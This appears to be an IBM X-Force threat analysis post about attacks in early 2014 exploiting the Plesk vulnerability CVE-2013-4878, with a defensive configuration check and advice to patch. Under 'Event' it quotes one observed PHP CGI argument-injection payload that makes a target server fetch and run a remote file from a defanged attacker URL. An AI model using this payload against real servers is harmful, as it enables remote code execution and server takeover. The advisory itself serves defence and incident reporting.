Background on Six Month Old Vulnerability Exploit Attempt

The IBM X-Force Threat Analysis Service (XFTAS) reports on vulnerabilities that need to be brought to the attention of our customers. Such was the case in June of 2013. We found a report on a Plesk Control Panel vulnerability (CVE-2013-4878) and provided the following assessment at that time:

Critical Plesk Vulnerability

Exploit code has been released that is reported to target versions 8.6, 9.0, 9.2, 9.3, and 9.5.4 of Plesk running on the Linux and FreeBSD operating systems. Plesk is a commercial software web administration package that allows an administrator to easily set up new websites, email accounts, and DNS entries via a web-based interface. The vulnerability is reported to rely on a non-default setting in Plesk which exposes the entire /usr/bin directory to the Internet. An attacker who successfully exploits this vulnerability can gain shell access to the victim’s server. Customers should verify that the following Plesk configuration entry is not present:

ScriptAlias /phppath/ "/usr/bin/"

Plesk administrators should contact their distribution channels for more information regarding configuration best practices.

• http://arstechnica.com/security/2013/06/more-than-360000-apache-websites-imperiled-by-crticial-vulnerability/
• http://www.reddit.com/r/netsec/comments/1fqe4g/plesk_apache_remote_0_day_king_cope/
• http://seclists.org/fulldisclosure/2013/Jun/25

Event

During the weekend of January 4th, the SOC began seeing attacks on our customers that appeared to be attempting to exploit this vulnerability. The payload of these attacks looked like this:

-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=hXXp://isp.vc/packets.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n

Actions Taken

The SOC escalated the event to management and began contacting affected customers. Further analysis of the attack revealed only one attacking IP, 80.82.78.9. It also gave a strong indication that the attack was against the Internet as a whole and not any specific customer or industry. While researching the attack, we saw that other organizations, such as ISC, were aware of activity from this IP address as well. In their report, however, the attack they noted appeared to be targeting potentially vulnerable Linksys devices.

Data Seen

The top ten signatures seen in connection with this attack were:

This is a common tactic among attackers. First they scan for open ports and then, based on their recon, select an appropriate attack vector from the exploits they have in stock.

Summary and Recommendations

Attacks, such as this one, only reinforces the XFTAS’ recommendations to keep operating systems and applications patched in a timely manner. Attacks against new vulnerabilities do not always occur immediately after their announcement. Sometimes, as in this case, it may be months before the vulnerability is exploited.

Further References

• https://isc.sans.edu/forums/diary/Scans+Increase+for+New+Linksys+Backdoor+32764+TCP+/17336
• http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4878
• http://kb.parallels.com/116241